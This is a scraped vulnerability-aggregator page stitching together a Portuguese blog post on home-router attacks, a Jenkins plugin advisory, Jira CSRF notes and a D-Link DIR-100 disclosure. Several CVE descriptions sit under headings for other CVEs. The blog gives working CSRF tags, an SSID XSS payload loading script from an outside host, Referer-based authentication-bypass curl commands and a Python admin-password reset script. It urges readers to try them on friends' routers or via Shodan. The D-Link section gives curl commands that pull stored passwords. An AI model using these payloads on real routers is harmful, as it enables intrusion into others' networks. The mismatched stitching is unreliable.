On TP-Link TL-WR849N 0.9.1 4.16 devices, a remote command execution vulnerability in the diagnostics area can be exploited when an attacker sends specific shell metacharacters to the panel's traceroute feature.

Hackers xiaomi e androids, algumas pessoas já vem me pedindo a algum tempo para falar um pouco sobre algumas vulns e exploits para roteadores (acho que é para fins educacionais), então, hoje irei falar sobre algumas vulnerabilidades presentes em alguns modelos de roteadores domésticos, os quais na maioria das vezes seus donos/usuários não se preocupam em manter sua firmware atualizado, também citarei exemplos explicando por que na maioria das vezes manter seu aparelho atualizado ainda poderá deixar passar alguns ataques.

Usarei os roteadores de marcas Intelbras e TP-Link nos exemplos, pois até agora são os únicos que tenho em mãos para realizar os testes, mas acredito que sirva de base para que vocês possam replicar os mesmos bugs em outros modelos.

Começando pelo bom e velho Intelbras, acho que tudo que tem “Intelbras” em seu nome terá esses mesmos bugs, vou citar só alguns exemplos em determinados modelos e versões, mas os bugs foram testados em outros tipos de painéis e na maioria eles estavam lá.

**CSRF****Roteador Wireless N 150 Mbps -WRN 240**

![itb](https://i.imgur.com/Wqpbpj9.png) Atire a senha do Facebook quem nunca viu esse painel na vida.

Acho que essa é a vulnerabilidade mais comum e conhecida nesses roteadores, Cross-site Request Forgery (CSRF ou XSRF), em português falsificação de solicitação entre sites, também conhecido como ataque de um clique.

Para salvar ou alterar alguma informação, seu painel adiciona esses valores em parâmetros em uma URL e faz a requisição via GET, onde essa URL é requisitada através de javascript ou iframe.

**Ex:**

Para reiniciar o roteador, quando vamos lá no menu e clicamos no botão reiniciar, o painel faz a requisição para o endereço: `http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reiniciar`

![restart](https://i.imgur.com/Uq1aiXb.png)

E então o roteador reinicia.

Poderíamos fazer o mesmo procedimento de uma maneira “escondida” do admin.

    $ echo “<img src=’http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reiniciar’>” > poc.html
    

![poc](https://i.imgur.com/mBunIIJ.png)

Agora podemos usar para alterar algumas outras informações como, nome da rede wifi, senhas, adicionar portas redirecionadas, mudar DNS etc.

**Video salvo em 02/07/2018**

Também testado no painel do _WRN 150_

![wrn](https://i.imgur.com/xo7Oz5g.png)

**Outro exemplo, agora com o **TP-LINK 150M Wireless N Router Model No. TL-WR740N****

    <img src="http://192.168.0.1/userRpm/VirtualServerRpm.htm?ExPort=22&InPort=22&Ip=192.168.0.100&Protocol=1&State=1&Commonport=0&Changed=0&SelIndex=0&Page=1&Save=Save">
    

**XSS**

Podemos encontrar XSS facilmente em vários inputs, principalmente se juntarmos o CSRF+XSS.

Mas vou mostrar um que achei mais “apresentável” pelo fato de que podemos encontrar o mesmo bug em outros dispositivos além de roteadores.

O XSS por SSID de um outro AP, nos roteadores podemos encontrar esse bug em páginas que mostrem SSID de outras redes, normalmente nas configurações para adicionar um novo “AP”.

Como o painel estará mostrando o nome das outras redes wireless, as vezes ele não filtra esses SSID e com isso conseguimos nosso XXS.

**Ex:**

Subindo nosso payload:

    airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon
    

Conteudo em _elb.me_:

**Resultado:**

![alert](https://i.imgur.com/F12K9wP.png)

Tenho um post sobre isso, explicando mais detalhadamente:

*   XSS NO ROTEADOR INTELBRAS WRN 240

**Auth Bypass: Alterando firmware e configurações sem autenticar no painel**

Primeiro começarei falando de um bug que encontrei num dos roteadores da TP-Link, não vou tomar os créditos para mim pois enquanto pesquisava notei que alguém já tinha reportado os mesmos, só que em outros modelos.

As vulnerabilidades baseavam-se em conseguir alterar ou ver informações no painel do roteador somente estando na mesma rede que o dispositivo, informações que somente quem poderia ver seriam pessoas que estivessem autenticadas nessa área administrativa.

A aplicação não ignorava headers de autenticação, principalmente o `"Cookie: Authorization=Basic BASE64="` mas verificava apenas o `"Referer: http://ip.router/"`, pois para ela se o usuário estava vindo com esse header, ele certamente estaria autenticado na plataforma, isso abriu ### portas para um novo ataque.

**Ex:**

    curl -X GET http://192.168.0.1/cgi/conf.bin
    

Resposta: `HTTP/1.1 403 Forbidden`

    curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
    

Resposta: `HTTP/1.1 200 OK`

**Exemplo de alteração de senha do painel do roteador:**

    import requests
    
    new = input('New Pass: ')
    url = 'http://192.168.0.1/cgi?8'
    headers = {'Content-Type': 'text/plain',
     'Referer': 'http://192.168.0.1/mainFrame.htm'}
    
    data = ''
    data += '[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
    data += 'oldPwd=admin\x0d\x0a'
    data += 'name=admin\x0d\x0a'
    data += 'pwd='+new+'\x0d\x0a'
    
    r = requests.post(url,data=data,headers=headers)
    
    print(r.text)
    

**Novos firmwares velhas vulns.**

Atualizei minha firmware para a nova versão publicada no site do distribuidor, e decidi verificar se algo tinha mudado, e realmente o bug do `Referer` não estava mais lá, independente de `Referer` ou não, todas as requisições GET estavam sendo liberadas somente para quem tivesse o _cookie_ certo.

Mas ainda sobrou alguns lugares em que as alterações eram feitas via POST, que no caso seriam: Restaurar arquivos de backup e alterar ou atualizar a firmware.

Restaurando backup do modelo Intelbras, mesmo removendo o `Authorization: Basic` ainda conseguimos fazer o upload do arquivo:

![](https://i.imgur.com/xFI9Ulv.png)

Uma boa ideia para tentar, seria baixar um arquivo de backup do seu _router_ e subir o mesmo no _router_ do seu amigo:

**PoC:**

    curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin http://192.1680.1/incoming/RouterBakCfgUpload.cfg
    

O mesmo acontece com a opção de atualizar a firmware.

![](https://i.imgur.com/3bEJT2e.png)

**TP-Link:**

![](https://i.imgur.com/oedwA0w.png)

    curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F data=@conf.binhttp://192.168.0.2/cgi/confup
    

**Não façam isso em casa**

Por enquanto é só isso, atualizarei este post frequentemente caso tenham mais modelos e novos bugs para demonstrar, não tentem reproduzir essas peripécias em casa, tentem nos _routers_ de amigos ou no Shodan, é mais divertido 😉.

![rip](https://i.imgur.com/cirhrTd.jpg)

**Referencias**

*   XSS NO ROTEADOR INTELBRAS WRN 240
*   intelbras dns change csrf
*   TP-LINK: Derrubando painel administrador com 1 requisição (Sem autenticação)
*   POC Router
*   TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass
*   Exploit Database Advanced Search - Title: TP-Link

Common Vulnerabilities and Exposures , Pentest , Proof of Concept

CVE-2020-9374: Hack ‘N’ Routers - Vulnerabilidades comuns em roteadores domésticos - [PT-BR]

Sympa 6.2.38 through 6.2.52 allows remote attackers to cause a denial of service (disk consumption from temporary files, and a flood of notifications to listmasters) via a series of requests with malformed parameters.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-9369: [SA 2020-001] Security flaws in CSRF prevension, CVE-2020-9369 · Issue #886 · sympa-community/sympa

graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.

CVE-2020-8813: Releases · Cacti/cacti

A missing permission check in Jenkins Pipeline GitHub Notify Step Plugin 1.0.4 and earlier in form-related methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Applatix Plugin
*   Azure AD Plugin
*   BMC Release Package and Deployment Plugin
*   brakeman Plugin
*   debian-package-builder Plugin
*   DigitalOcean Plugin
*   Dynamic Extended Choice Parameter Plugin
*   Eagle Tester Plugin
*   ECX Copy Data Management Plugin
*   FitNesse Plugin
*   Git Parameter Plugin
*   Google Kubernetes Engine Plugin
*   Harvest SCM Plugin
*   NUnit Plugin
*   Parasoft Environment Manager Plugin
*   Pipeline GitHub Notify Step Plugin
*   Pipeline: Groovy Plugin
*   RadarGun Plugin
*   S3 publisher Plugin
*   Script Security Plugin
*   Subversion Plugin

**Descriptions****Sandbox bypass via default method parameter expression in Pipeline: Groovy Plugin**

**SECURITY-1710 / CVE-2020-2109**

Sandbox protection in Pipeline: Groovy Plugin 2.78 and earlier can be circumvented through default parameter expressions in CPS-transformed methods.

This allows attackers able to specify and run sandboxed Pipelines to execute arbitrary code in the context of the Jenkins controller JVM.

These expressions are subject to sandbox protection in Pipeline: Groovy Plugin 2.79.

**Sandbox bypass vulnerability in Script Security Plugin**

**SECURITY-1713 / CVE-2020-2110**

Sandbox protection in Script Security Plugin 1.69 and earlier can be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to imports or by using them inside of other annotations. This affects both script execution (typically invoked from other plugins like Pipeline) as well as HTTP endpoints providing sandboxed script validation.

Users with Overall/Read permission can exploit this to bypass sandbox protection and execute arbitrary code on the Jenkins controller.

This issue is due to an incomplete fix of SECURITY-1266.

Script Security Plugin 1.70 disallows all known unsafe AST transformations on imports or when used inside of other annotations.

**Stored XSS vulnerability in Subversion Plugin**

**SECURITY-1725 / CVE-2020-2111**

Subversion Plugin 2.13.0 and earlier does not escape the error message for the Project Repository Base URL field form validation. This results in a stored cross-site scripting vulnerability exploitable by users able to specify such base URLs, for example users able to configure Multibranch Pipelines.

Subversion Plugin 2.13.1 escapes the affected part of the error message.

**Multiple stored XSS vulnerabilities in Git Parameter Plugin**

**SECURITY-1709 / CVE-2020-2112 (parameter name), CVE-2020-2113 (default value)**

Git Parameter Plugin 0.9.11 and earlier does not correctly escape the parameter name or default value. This results in a stored cross-site scripting vulnerability exploitable by users with Job/Configure permission.

Git Parameter Plugin 0.9.12 escapes the parameter name and default value shown on the UI.

**Credential transmitted in plain text by S3 publisher Plugin**

**SECURITY-1684 / CVE-2020-2114**

S3 publisher Plugin stores a secret key in its global configuration.

While the credential is stored encrypted on disk, it is transmitted in plain text as part of the configuration form by S3 publisher Plugin 0.11.4 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

S3 publisher Plugin 0.11.5 transmits the secret key in its global configuration encrypted.

**XXE vulnerability in NUnit Plugin**

**SECURITY-1752 / CVE-2020-2115**

NUnit Plugin 0.25 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for its post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

NUnit Plugin 0.26 disables external entity processing for its XML parser.

**CSRF vulnerability and missing permission checks in Pipeline GitHub Notify Step Plugin allows capturing credentials**

**SECURITY-812 (1) / CVE-2020-2116 (CSRF), CVE-2020-2117 (missing permission check)**

Pipeline GitHub Notify Step Plugin 1.0.4 and earlier does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

This form validation method requires POST requests and Item/Configure permission in Pipeline GitHub Notify Step Plugin 1.0.5.

**Users with Overall/Read access can enumerate credential IDs in Pipeline GitHub Notify Step Plugin**

**SECURITY-812 (2) / CVE-2020-2118**

Pipeline GitHub Notify Step Plugin 1.0.4 and earlier provides a list of applicable credential IDs to allow users configuring the plugin to select the one to use.

This functionality does not correctly check permissions, allowing any user with Overall/Read permission to get a list of valid credentials IDs. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Pipeline GitHub Notify Step Plugin 1.0.5 requires the permission to configure a project.

**Client secret transmitted in plain text by Azure AD Plugin**

**SECURITY-1717 / CVE-2020-2119**

Azure AD Plugin stores a client secret in its global configuration.

While the credential is stored encrypted on disk, it is transmitted in plain text as part of the configuration form by Azure AD Plugin 1.1.2 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

Azure AD Plugin 1.2.0 transmits the client secret in its global configuration encrypted.

**XXE vulnerability in FitNesse Plugin**

**SECURITY-1751 / CVE-2020-2120**

FitNesse Plugin 1.30 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for its post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

FitNesse Plugin 1.31 disables external entity processing for its XML parser.

**RCE vulnerability in Google Kubernetes Engine Plugin**

**SECURITY-1731 / CVE-2020-2121**

Google Kubernetes Engine Plugin 0.8.0 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types. This results in a remote code execution vulnerability exploitable by users able to provide YAML input files to Google Kubernetes Engine Plugin’s build step.

Google Kubernetes Engine Plugin 0.8.1 configures its YAML parser to only instantiate safe types.

**Stored XSS vulnerability in brakeman Plugin**

**SECURITY-1644 / CVE-2020-2122**

brakeman Plugin 0.12 and earlier did not escape values received from parsed JSON files when rendering them, resulting in a stored cross-site scripting vulnerability.

This vulnerability can be exploited by users able to control the Brakeman post-build step input data.

brakeman Plugin 0.13 escape affected values from the parsed file as they are recorded.

This fix is only applied to newly recorded data after a fixed version of the plugin is installed; historical data may still contain unsafe values.

**RCE vulnerability in RadarGun Plugin**

**SECURITY-1733 / CVE-2020-2123**

RadarGun Plugin 1.7 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types. This results in a remote code execution vulnerability exploitable by users able to configure RadarGun Plugin’s build step.

RadarGun Plugin 1.8 configures its YAML parser to only instantiate safe types.

**Password stored in plain text by Dynamic Extended Choice Parameter Plugin**

**SECURITY-1560 / CVE-2020-2124**

Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier stores a Subversion password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Credentials stored in plain text by debian-package-builder Plugin**

**SECURITY-1558 / CVE-2020-2125**

debian-package-builder Plugin 1.6.11 and earlier stores a GPG passphrase unencrypted in its global configuration file ru.yandex.jenkins.plugins.debuilder.DebianPackageBuilder.xml on the Jenkins controller. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Token stored in plain text by DigitalOcean Plugin**

**SECURITY-1559 / CVE-2020-2126**

DigitalOcean Plugin 1.1 and earlier stores a token unencrypted in the global config.xml files as part of its configuration. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Credential stored in plain text by BMC Release Package and Deployment Plugin**

**SECURITY-1547 / CVE-2020-2127**

BMC Release Package and Deployment Plugin 1.1 and earlier stores the RPD user token unencrypted in its global configuration file com.bmc.rpd.jenkins.plugin.bmcrpd.configuration.RPDPluginConfiguration.xml on the Jenkins controller. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Password stored in plain text by ECX Copy Data Management Plugin**

**SECURITY-1549 / CVE-2020-2128**

ECX Copy Data Management Plugin 1.9 and earlier stores a service password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Password stored in plain text by Eagle Tester Plugin**

**SECURITY-1552 / CVE-2020-2129**

Eagle Tester Plugin 1.0.9 and earlier stores a password unencrypted in its global configuration file com.bmc.rpd.jenkins.plugin.bmcrpd.configuration.RPDPluginConfiguration.xml on the Jenkins controller. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Passwords stored in plain text by Harvest SCM Plugin**

**SECURITY-1553 / CVE-2020-2130 (global configuration), CVE-2020-2131 (job configuration)**

Harvest SCM Plugin 0.5.1 and earlier stores SCM passwords unencrypted in its global configuration file hudson.plugins.harvest.HarvestSCM.xml and in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission (job config.xml only) or access to the Jenkins controller file system (both).

As of publication of this advisory, there is no fix.

**Password stored in plain text by Parasoft Environment Manager Plugin**

**SECURITY-1562 / CVE-2020-2132**

Parasoft Environment Manager Plugin 2.14 and earlier stores a repository password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Password stored in plain text by Applatix Plugin**

**SECURITY-1540 / CVE-2020-2133**

Applatix Plugin 1.1 and earlier stores the Applatix password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-812 (1): High
*   SECURITY-812 (2): Medium
*   SECURITY-1540: Medium
*   SECURITY-1547: Low
*   SECURITY-1549: Medium
*   SECURITY-1552: Low
*   SECURITY-1553: Medium
*   SECURITY-1558: Low
*   SECURITY-1559: Low
*   SECURITY-1560: Medium
*   SECURITY-1562: Medium
*   SECURITY-1644: Medium
*   SECURITY-1684: Low
*   SECURITY-1709: Medium
*   SECURITY-1710: High
*   SECURITY-1713: High
*   SECURITY-1717: Low
*   SECURITY-1725: Medium
*   SECURITY-1731: High
*   SECURITY-1733: High
*   SECURITY-1751: High
*   SECURITY-1752: High

**Affected Versions**

*   **Applatix Plugin** up to and including 1.1
*   **Azure AD Plugin** up to and including 1.1.2
*   **BMC Release Package and Deployment Plugin** up to and including 1.1
*   **brakeman Plugin** up to and including 0.12
*   **debian-package-builder Plugin** up to and including 1.6.11
*   **DigitalOcean Plugin** up to and including 1.1
*   **Dynamic Extended Choice Parameter Plugin** up to and including 1.0.1
*   **Eagle Tester Plugin** up to and including 1.0.9
*   **ECX Copy Data Management Plugin** up to and including 1.9
*   **FitNesse Plugin** up to and including 1.30
*   **Git Parameter Plugin** up to and including 0.9.11
*   **Google Kubernetes Engine Plugin** up to and including 0.8.0
*   **Harvest SCM Plugin** up to and including 0.5.1
*   **NUnit Plugin** up to and including 0.25
*   **Parasoft Environment Manager Plugin** up to and including 2.14
*   **Pipeline GitHub Notify Step Plugin** up to and including 1.0.4
*   **Pipeline: Groovy Plugin** up to and including 2.78
*   **RadarGun Plugin** up to and including 1.7
*   **S3 publisher Plugin** up to and including 0.11.4
*   **Script Security Plugin** up to and including 1.69
*   **Subversion Plugin** up to and including 2.13.0

**Fix**

*   **Azure AD Plugin** should be updated to version 1.2.0
*   **brakeman Plugin** should be updated to version 0.13
*   **FitNesse Plugin** should be updated to version 1.31
*   **Git Parameter Plugin** should be updated to version 0.9.12
*   **Google Kubernetes Engine Plugin** should be updated to version 0.8.1
*   **NUnit Plugin** should be updated to version 0.26
*   **Pipeline GitHub Notify Step Plugin** should be updated to version 1.0.5
*   **Pipeline: Groovy Plugin** should be updated to version 2.79
*   **RadarGun Plugin** should be updated to version 1.8
*   **S3 publisher Plugin** should be updated to version 0.11.5
*   **Script Security Plugin** should be updated to version 1.70
*   **Subversion Plugin** should be updated to version 2.13.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Applatix Plugin
*   BMC Release Package and Deployment Plugin
*   debian-package-builder Plugin
*   DigitalOcean Plugin
*   Dynamic Extended Choice Parameter Plugin
*   Eagle Tester Plugin
*   ECX Copy Data Management Plugin
*   Harvest SCM Plugin
*   Parasoft Environment Manager Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Adith Sudhakar** for SECURITY-1644
*   **Daniel Kalinowski of ISEC.pl Research Team** for SECURITY-1731, SECURITY-1733
*   **Federico Pellegrin** for SECURITY-1751, SECURITY-1752
*   **James Holderness, IB Boost** for SECURITY-1540, SECURITY-1547, SECURITY-1549, SECURITY-1552, SECURITY-1553, SECURITY-1558, SECURITY-1559, SECURITY-1560, SECURITY-1562
*   **Joseph Petersen @jetersen** for SECURITY-1717
*   **Nils Emmerich of ERNW Research GmbH** for SECURITY-1710, SECURITY-1713
*   **Sven Grossmann (@svennergr)** for SECURITY-1709
*   **Thomas de Grenier de Latour** for SECURITY-812 (1), SECURITY-812 (2)
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1684, SECURITY-1725

CVE-2020-2118: Jenkins Security Advisory 2020-02-12

A missing permission check in Jenkins Pipeline GitHub Notify Step Plugin 1.0.4 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2020-2117: Jenkins Security Advisory 2020-02-12

The VerifySmtpServerConnection!add.jspa component in Atlassian Jira Server and Data Center before version 8.7.0 is vulnerable to cross-site request forgery (CSRF). An attacker could exploit this by tricking an administrative user into making malicious HTTP requests, allowing the attacker to enumerate hosts and open ports on the internal network where Jira server is present.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

CVE-2019-20098: Atlassian Jira Multiple CSRF

The VerifyPopServerConnection!add.jspa component in Atlassian Jira Server and Data Center before version 8.7.0 is vulnerable to cross-site request forgery (CSRF). An attacker could exploit this by tricking an administrative user into making malicious HTTP requests, allowing the attacker to enumerate hosts and open ports on the internal network where Jira server is present.

CVE-2019-20099: [JRASERVER-70606] CSRF in VerifyPopServerConnection!add.jspa - CVE-2019-20099

Various installation setup resources in Jira before version 8.5.2 allow remote attackers to configure a Jira instance, which has not yet finished being installed, via Cross-site request forgery (CSRF) vulnerabilities.

Various installation setup resources in Jira before version 8.5.2 allow remote attackers to configure a Jira instance, which has not yet finished being installed, via Cross-site request forgery (CSRF) vulnerabilities.

Once a Jira instance is setup (i.e. database, admin account, licence, etc. form are filled) the vulnerability can't be exploited anymore.

CVE-2019-20401: [JRASERVER-70406] Various Jira Server setup resources are vulnerable to XSRF/CSRF - CVE-2019-20401

CVE-2013-7053

D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters

    * Title: Router D-Link DIR-100 Multiple Vulnerabilities
    * Date: 2013-09-19
    * Author: Felix Richter
    * Contact: root@euer.krebsco.de
    * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
    * Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
    * Report Version: 2.0
    * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
    * Vulnerable: D-Link DIR-100
        * Hardware Revision: D1
        * Software Version: 4.03B07 (from 2012-04-10)
    * CVE Numbers: 
        * CWE-287 Authentication Issues:             CVE-2013-7051
        * CWE-255 Issues with Credential Management: CVE-2013-7052
        * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053
        * CWE-79  Cross-Site Scripting:              CVE-2013-7054
        * CWE-200 Information Disclosure:            CVE-2013-7055
    * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
    * State: Patched by Vendor
    * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
    
    # Table of Contents
    
        1. Background
        2. Vulnerability Description
        3. Technical Description
        4. Severity and Remediation
        5. Timeline
    
    # 1. Background
    
    The DIR-100 is designed for easy and robust connectivity among heterogeneous
    standards-based network devices. Computers can communicate directly with this
    router for automatic opening and closing of UDP/TCP ports to take full
    advantage of the security provided without sacrificing functionality of on-line
    applications.
    
    # 2 Vulnerability Description
    
    Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
    Broadband Router Revision D (and potentially other devices sharing the 
    affected firmware) that could allow a remote attacker:
    
     - Retrieve the Administrator password without authentication leading to
       authentication bypass [CWE-255]
     - Retrieve sensitive configuration paramters like the pppoe username and
       password without authentication [CWE-200]
     - Execute privileged Commands without authentication through a race
       condition leading to weak authentication enforcement [CWE-287]
     - Sending formatted request to a victim which then will execute arbitrary
       commands on the device (CSRF) [CWE-352]
     - Store arbitrary javascript code which will be executed when a victim
       accesses the administrator interface [CWE-79]
    
    CVE-Numbers for these vulnerabilities has not yet been assigned.
    
    # 3 Technical Description of the Vulnerabilities
    
    ## 3.0 The DIR-100 Web Interface and CGI
    
    The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
    unauthenticated users and `/cli.cgi` for authenticated requests.
    
    list of features provided by each cgi-script can be retrieved by:
    
        curl 'http://192.168.1.104/cliget.cgi?cmd=help'
        # and respectively when authenticated
        curl 'http://192.168.1.104/cli.cgi?cmd=help'
    
    ## 3.1 Authentication Bypass
    
    ### Description
    
    The administrator password is not protected in any way on the device, every
    attacker with access to the administrator interface which listens on port 80.
    For retrieving the Administrator password the request must not be
    authenticated. 
    
    
    ### Proof of Concept
    
    The web interface provides two distinct ways to retrieve the adminstrator
    password:
    
        curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
        curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
    
    ## 3.2 Weak Authentication
    
    ### Description
    
    As soon as a user is logged into the administration interface, the cli CGI
    is `unlocked` and can be used by without authenticating before as
    the cgi-script does not check any other authentication parameters such as
    cookies or HTTP Parameters. The only access check is if the IP-Address is 
    the same. 
    
    ### Proof of Concept
        
        # open the router interface in a web browser and log in
        firefox  'http://192.168.0.1/' 
        
        # open a new terminal or another web-browser which is currently not logged
        # in and try to access
    
        curl 'http://192.168.0.1/cli.cgi?cmd=help'
    
        # this request will be authenticated and it will not be redirected to the
        # login page. If no user is logged in, the request will be redirected to
        # the login 
    
    ## 3.3 Retrieve sensitive information
    
    ### Description
    
    Besides retrieving the administrator password without authentication it is
    possible to retrieve other sensitive configuration from the device as well like
    the PPTP and poe Username and Password, as well as the configured dyndns
    username and password and configured mail log credentials when these parameters
    are configured. 
    No authentication is requred.
    
    ### Proof of Concept
    
        curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
    
    ## 3.4 Cross-Site Request Forgery (CSRF)
    
    ### Description
    
    CSRF attacks can be launched by sending a formatted request to a victim, then
    tricking the victim into loading the request (often automatically), which
    makes it appear that the request came from the victim. As an example the
    attacker could change the administrator password (see Proof of Concept code)
    and enable system remote access.
    
    ### Proof of Concept
    
    Changing the password for administrator can be done when the ip-address is
    authenticated:
    
        # Log into DIR-100
        curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    
        # Change password
        curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
    
        # enable remote console
        curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
    
    ## 3.5 Cross-Site Scripting (XSS)
    
    ### Description
    
    It is possible for an authenticated user to store information on the server
    which will not be checked on the server side for special characters which
    results in persistent Cross-Site Scripting Vulnerabilities. With this
    vulnerabilty the victim (administrator) will run javascript code in the 
    context of the D-Link DIR-100.
    
    XSS is possible because only on the client side (javascript code) the input is
    filtered and validated, sending data directly to the CGI scripts.
    
    ### Proof of Concept
    
        # Log into DIR-100
        curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    
        #  XSS in Static IP Address Tab
        curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
    
        # XSS in Scheduler tab
        curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
    
    # 4 Severity and Remediation
    
    This exploits are considered very critical, especially when the feature of remote
    administration is activated on the system.  
    Weak authentication, together with cross-site request forgery and authentication 
    bypass can result in a full device compromise from an arbitrary website the victim is
    accessing, even if the device has remote administration deactivated on the
    internet-port. It is recommended to upgrade the router with the newest firmware
    of the D-Link DIR-100.
    
    # 5 Timeline
    
    2013-09-13 - First Contact with D-Link Support
    2013-09-19 - Sent Report
    2013-10-14 - Request Status update, Response: Beta will be available mid October
    2013-12-02 - Vendor publishes Firmware Update 
    2013-12-11 - Request CVE-IDs
    2013-12-18 - Publish the report

Tag

#csrf